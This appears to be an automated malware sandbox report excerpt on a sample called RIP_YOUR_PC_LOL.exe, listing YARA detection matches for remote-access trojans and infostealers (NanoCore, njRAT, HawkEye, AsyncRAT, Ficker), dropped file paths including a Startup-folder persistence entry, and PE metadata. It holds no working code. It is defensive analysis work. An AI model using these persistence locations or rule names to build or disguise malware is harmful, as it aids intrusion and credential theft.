                    Source: 00000004.00000000.382829254.0000000000902000.00000002.00000001.01000000.00000005.sdmp, type: MEMORYMatched rule: Identify njRat Author: Brian Wallace @botnet_hunter
                    Source: 00000004.00000000.383946223.0000000000902000.00000002.00000001.01000000.00000005.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
                    Source: 00000004.00000000.383946223.0000000000902000.00000002.00000001.01000000.00000005.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 00000004.00000000.383946223.0000000000902000.00000002.00000001.01000000.00000005.sdmp, type: MEMORYMatched rule: Identify njRat Author: Brian Wallace @botnet_hunter
                    Source: Process Memory Space: RIP_YOUR_PC_LOL.exe PID: 6880, type: MEMORYSTRMatched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
                    Source: Process Memory Space: healastounding.exe PID: 3572, type: MEMORYSTRMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
                    Source: Process Memory Space: healastounding.exe PID: 3572, type: MEMORYSTRMatched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
                    Source: Process Memory Space: healastounding.exe PID: 3572, type: MEMORYSTRMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
                    Source: Process Memory Space: test.exe PID: 6236, type: MEMORYSTRMatched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
                    Source: Process Memory Space: test.exe PID: 6236, type: MEMORYSTRMatched rule: Detects AsyncRAT Author: ditekSHen
                    Source: Process Memory Space: Opus.exe PID: 3244, type: MEMORYSTRMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
                    Source: Process Memory Space: Opus.exe PID: 3244, type: MEMORYSTRMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
                    Source: C:\Users\user\AppData\Roaming\gay.exe, type: DROPPEDMatched rule: Detects NjRAT / Bladabindi Author: ditekSHen
                    Source: C:\Users\user\AppData\Roaming\gay.exe, type: DROPPEDMatched rule: Identify njRat Author: Brian Wallace @botnet_hunter
                    Source: C:\Users\user\AppData\Roaming\Opus.exe, type: DROPPEDMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
                    Source: C:\Users\user\AppData\Roaming\Opus.exe, type: DROPPEDMatched rule: Detects NanoCore Author: ditekSHen
                    Source: C:\Users\user\AppData\Roaming\Opus.exe, type: DROPPEDMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
                    Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a797c6ca3f5e7aff8fa1149c47fe9466.exe, type: DROPPEDMatched rule: Detects NjRAT / Bladabindi Author: ditekSHen
                    Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a797c6ca3f5e7aff8fa1149c47fe9466.exe, type: DROPPEDMatched rule: Identify njRat Author: Brian Wallace @botnet_hunter
                    Source: C:\Users\user\AppData\Roaming\mediaget.exe, type: DROPPEDMatched rule: Detects NjRAT / Bladabindi Author: ditekSHen
                    Source: C:\Users\user\AppData\Roaming\mediaget.exe, type: DROPPEDMatched rule: Identify njRat Author: Brian Wallace @botnet_hunter
                    Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe, type: DROPPEDMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
                    Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe, type: DROPPEDMatched rule: Detects NanoCore Author: ditekSHen
                    Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe, type: DROPPEDMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
                    Source: C:\Users\user\AppData\Roaming\test.exe, type: DROPPEDMatched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
                    Source: C:\Windows\Help\active_desktop_render.dll, type: DROPPEDMatched rule: Detects executables using BlackMoon RunTime Author: ditekSHen
                    Source: C:\Users\user\AppData\Roaming\Pluto Panel.exe, type: DROPPEDMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                    Source: C:\Users\user\AppData\Roaming\Pluto Panel.exe, type: DROPPEDMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                    Source: C:\Users\user\AppData\Roaming\3.exe, type: DROPPEDMatched rule: DCRat payload Author: ditekSHen
                    Source: C:\Users\user\AppData\Roaming\3.exe, type: DROPPEDMatched rule: Detects AsyncRAT Author: ditekSHen
                    Source: C:\Users\user\AppData\Roaming\22.exe, type: DROPPEDMatched rule: Detects executables using BlackMoon RunTime Author: ditekSHen
                    Source: C:\Users\user\AppData\Roaming\healastounding.exe, type: DROPPEDMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
                    Source: C:\Users\user\AppData\Roaming\healastounding.exe, type: DROPPEDMatched rule: Detects NjRAT / Bladabindi Author: ditekSHen
                    Source: C:\Users\user\AppData\Roaming\healastounding.exe, type: DROPPEDMatched rule: Detects NanoCore Author: ditekSHen
                    PE file has nameless sections
                    Source: a.exe.4.drStatic PE information: section name:
                    Source: a.exe.4.drStatic PE information: section name:
                    Source: a.exe.4.drStatic PE information: section name:
                    Source: a.exe.4.drStatic PE information: section name:
                    Source: C:\Users\user\AppData\Roaming\healastounding.exeCode function: 4_2_009466CB4_2_009466CB
                    Source: C:\Users\user\AppData\Roaming\healastounding.exeCode function: 4_2_0090576E4_2_0090576E
                    Source: C:\Users\user\AppData\Roaming\Pluto Panel.exeCode function: 5_2_00F1D4265_2_00F1D426
                    Source: C:\Users\user\AppData\Roaming\Pluto Panel.exeCode function: 5_2_00F2D5AE5_2_00F2D5AE
                    Source: C:\Users\user\AppData\Roaming\Pluto Panel.exeCode function: 5_2_00F1D5235_2_00F1D523
                    Source: C:\Users\user\AppData\Roaming\Pluto Panel.exeCode function: 5_2_00F276465_2_00F27646
                    Source: C:\Users\user\AppData\Roaming\Pluto Panel.exeCode function: 5_2_00F529BE5_2_00F529BE
                    Source: C:\Users\user\AppData\Roaming\Pluto Panel.exeCode function: 5_2_00F56AF45_2_00F56AF4
                    Source: C:\Users\user\AppData\Roaming\Pluto Panel.exeCode function: 5_2_00F7ABFC5_2_00F7ABFC
                    Source: C:\Users\user\AppData\Roaming\Pluto Panel.exeCode function: 5_2_00F73CBE5_2_00F73CBE
                    Source: C:\Users\user\AppData\Roaming\Pluto Panel.exeCode function: 5_2_00F73C4D5_2_00F73C4D
                    Source: C:\Users\user\AppData\Roaming\Pluto Panel.exeCode function: 5_2_00F73DC05_2_00F73DC0
                    Source: C:\Users\user\AppData\Roaming\Pluto Panel.exeCode function: 5_2_00F73D2F5_2_00F73D2F
                    Source: C:\Users\user\AppData\Roaming\Pluto Panel.exeCode function: 5_2_00F1ED035_2_00F1ED03
                    Source: C:\Users\user\AppData\Roaming\Pluto Panel.exeCode function: 5_2_00F2AFA65_2_00F2AFA6
                    Source: C:\Users\user\AppData\Roaming\Pluto Panel.exeCode function: 5_2_00F1CF925_2_00F1CF92
                    Source: C:\Users\user\AppData\Roaming\Pluto Panel.exeCode function: 5_2_016724775_2_01672477
                    Source: C:\Users\user\AppData\Roaming\Pluto Panel.exeCode function: 5_2_032057585_2_03205758
                    Source: C:\Users\user\AppData\Roaming\Pluto Panel.exeCode function: 5_2_03201D985_2_03201D98
                    Source: C:\Users\user\AppData\Roaming\Pluto Panel.exeCode function: 5_2_03207FCA5_2_03207FCA
                    Source: C:\Users\user\AppData\Roaming\Pluto Panel.exeCode function: 5_2_03207FD05_2_03207FD0
                    Source: C:\Users\user\AppData\Roaming\Pluto Panel.exeCode function: 5_2_032060485_2_03206048
                    Source: C:\Users\user\AppData\Roaming\Pluto Panel.exeCode function: 5_2_0320708A5_2_0320708A
                    Source: C:\Users\user\AppData\Roaming\Pluto Panel.exeCode function: 5_2_032070985_2_03207098
                    Source: C:\Users\user\AppData\Roaming\Pluto Panel.exeCode function: 5_2_00F4C7BC5_2_00F4C7BC
                    Source: C:\Users\user\AppData\Roaming\Pluto Panel.exeCode function: 5_2_03201DA85_2_03201DA8
                    Source: C:\Users\user\AppData\Roaming\0fd7de5367376231a788872005d7ed4f.exeCode function: 7_2_0040D3907_2_0040D390
                    Source: C:\Users\user\AppData\Roaming\gay.exeCode function: 8_2_000D6B5E8_2_000D6B5E
                    Source: Pluto Panel.exe.0.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                    Source: Pluto Panel.exe.0.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                    Source: Pluto Panel.exe.0.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                    Source: 0fd7de5367376231a788872005d7ed4f.exe.0.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                    Source: 0fd7de5367376231a788872005d7ed4f.exe.0.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                    Source: 0fd7de5367376231a788872005d7ed4f.exe.0.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                    Source: 0fd7de5367376231a788872005d7ed4f.exe.0.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                    Source: ___11.19.exe.0.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                    Source: ___11.19.exe.0.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                    Source: ___11.19.exe.0.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                    Source: ___11.19.exe.0.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                    Source: ___11.19.exe.0.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                    Source: ___11.19.exe.0.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                    Source: ___11.19.exe.0.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                    Source: ___11.19.exe.0.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                    Source: C:\Users\user\AppData\Roaming\4.exeSection loaded: <pi-ms-win-core-synch-l1-2-0.dll
                    Source: C:\Users\user\AppData\Roaming\4.exeSection loaded: <pi-ms-win-core-fibers-l1-1-1.dll
                    Source: C:\Users\user\AppData\Roaming\4.exeSection loaded: <pi-ms-win-core-synch-l1-2-0.dll
                    Source: C:\Users\user\AppData\Roaming\4.exeSection loaded: <pi-ms-win-core-fibers-l1-1-1.dll
                    Source: C:\Users\user\AppData\Roaming\4.exeSection loaded: <pi-ms-win-core-localization-l1-2-1.dll
                    Source: C:\Users\user\AppData\Roaming\4.exeSection loaded: dxgidebug.dll
                    Source: RIP_YOUR_PC_LOL.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
                    Source: RIP_YOUR_PC_LOL.exe, type: SAMPLEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
                    Source: RIP_YOUR_PC_LOL.exe, type: SAMPLEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: RIP_YOUR_PC_LOL.exe, type: SAMPLEMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                    Source: RIP_YOUR_PC_LOL.exe, type: SAMPLEMatched rule: MALWARE_Win_BlackMoon author = ditekSHen, description = Detects executables using BlackMoon RunTime
                    Source: RIP_YOUR_PC_LOL.exe, type: SAMPLEMatched rule: MALWARE_Win_NjRAT author = ditekSHen, description = Detects NjRAT / Bladabindi
                    Source: RIP_YOUR_PC_LOL.exe, type: SAMPLEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
                    Source: RIP_YOUR_PC_LOL.exe, type: SAMPLEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
                    Source: RIP_YOUR_PC_LOL.exe, type: SAMPLEMatched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
                    Source: RIP_YOUR_PC_LOL.exe, type: SAMPLEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 0.0.RIP_YOUR_PC_LOL.exe.206ac1d.13.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
                    Source: 0.2.RIP_YOUR_PC_LOL.exe.d4dd52.5.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_BlackMoon author = ditekSHen, description = Detects executables using BlackMoon RunTime
                    Source: 0.3.RIP_YOUR_PC_LOL.exe.5a556c1.5.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
                    Source: 9.2.Opus.exe.840000.0.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
                    Source: 9.2.Opus.exe.840000.0.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                    Source: 9.2.Opus.exe.840000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
                    Source: 9.2.Opus.exe.840000.0.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
                    Source: 9.0.Opus.exe.840000.0.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
                    Source: 9.0.Opus.exe.840000.0.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                    Source: 9.0.Opus.exe.840000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
                    Source: 9.0.Opus.exe.840000.0.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
                    Source: 4.2.healastounding.exe.34865dc.7.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NjRAT author = ditekSHen, description = Detects NjRAT / Bladabindi
                    Source: 4.2.healastounding.exe.34865dc.7.unpack, type: UNPACKEDPEMatched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
                    Source: 8.0.gay.exe.d0000.2.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NjRAT author = ditekSHen, description = Detects NjRAT / Bladabindi
                    Source: 8.0.gay.exe.d0000.2.unpack, type: UNPACKEDPEMatched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
                    Source: 0.0.RIP_YOUR_PC_LOL.exe.c8867b.4.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_BlackMoon author = ditekSHen, description = Detects executables using BlackMoon RunTime
                    Source: 11.0.22.exe.5f65b6.17.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_BlackMoon author = ditekSHen, description = Detects executables using BlackMoon RunTime
                    Source: 5.2.Pluto Panel.exe.36b9cb4.4.raw.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                    Source: 0.2.RIP_YOUR_PC_LOL.exe.1ce9ce8.12.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
                    Source: 0.2.RIP_YOUR_PC_LOL.exe.1ce9ce8.12.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                    Source: 0.2.RIP_YOUR_PC_LOL.exe.1ce9ce8.12.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
                    Source: 0.2.RIP_YOUR_PC_LOL.exe.1ce9ce8.12.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
                    Source: 5.0.Pluto Panel.exe.f10000.8.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 5.0.Pluto Panel.exe.f10000.8.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                    Source: 5.0.Pluto Panel.exe.f10000.8.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 5.2.Pluto Panel.exe.f6fa72.1.raw.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 5.2.Pluto Panel.exe.f6fa72.1.raw.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 5.2.Pluto Panel.exe.f10000.0.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 5.2.Pluto Panel.exe.f10000.0.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                    Source: 5.2.Pluto Panel.exe.f10000.0.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 9.2.Opus.exe.5b00000.7.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
                    Source: 9.2.Opus.exe.5b00000.7.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                    Source: 9.2.Opus.exe.5b00000.7.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
                    Source: 5.2.Pluto Panel.exe.f18208.3.raw.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 5.2.Pluto Panel.exe.f18208.3.raw.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                    Source: 5.2.Pluto Panel.exe.f18208.3.raw.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 6.2.test.exe.da0000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
                    Source: 15.0.0fd7de5367376231a788872005d7ed4f.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_Ficker author = ditekSHen, description = Detects Ficker infostealer, clamav_sig = MALWARE.Win.Trojan.Ficker
                    Source: 8.2.gay.exe.d0000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NjRAT author = ditekSHen, description = Detects NjRAT / Bladabindi
                    Source: 8.2.gay.exe.d0000.0.unpack, type: UNPACKEDPEMatched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
                    Source: 7.2.0fd7de5367376231a788872005d7ed4f.exe.24f15a0.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_Ficker author = ditekSHen, description = Detects Ficker infostealer, clamav_sig = MALWARE.Win.Trojan.Ficker
                    Source: 0.2.RIP_YOUR_PC_LOL.exe.1f6c52e.15.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
                    Source: 5.2.Pluto Panel.exe.f19c0d.2.raw.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 5.2.Pluto Panel.exe.f19c0d.2.raw.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 4.2.healastounding.exe.4474268.10.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
                    Source: 4.2.healastounding.exe.4474268.10.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                    Source: 4.2.healastounding.exe.4474268.10.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
                    Source: 4.2.healastounding.exe.4474268.10.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
                    Source: 0.0.RIP_YOUR_PC_LOL.exe.1f6c52e.15.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
                    Source: 0.1.RIP_YOUR_PC_LOL.exe.9f22de.1.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 0.1.RIP_YOUR_PC_LOL.exe.9f22de.1.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                    Source: 0.1.RIP_YOUR_PC_LOL.exe.9f22de.1.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 0.0.RIP_YOUR_PC_LOL.exe.1d1caed.10.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NjRAT author = ditekSHen, description = Detects NjRAT / Bladabindi
                    Source: 0.0.RIP_YOUR_PC_LOL.exe.1d1caed.10.raw.unpack, type: UNPACKEDPEMatched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
                    Source: 9.2.Opus.exe.5b00000.7.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
                    Source: 9.2.Opus.exe.5b00000.7.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                    Source: 9.2.Opus.exe.5b00000.7.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
                    Source: 5.2.Pluto Panel.exe.3b3a1c4.6.raw.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                    Source: 4.2.healastounding.exe.3479694.5.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
                    Source: 4.2.healastounding.exe.3479694.5.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NjRAT author = ditekSHen, description = Detects NjRAT / Bladabindi
                    Source: 4.2.healastounding.exe.3479694.5.raw.unpack, type: UNPACKEDPEMatched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
                    Source: 15.0.0fd7de5367376231a788872005d7ed4f.exe.400000.5.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_Ficker author = ditekSHen, description = Detects Ficker infostealer, clamav_sig = MALWARE.Win.Trojan.Ficker
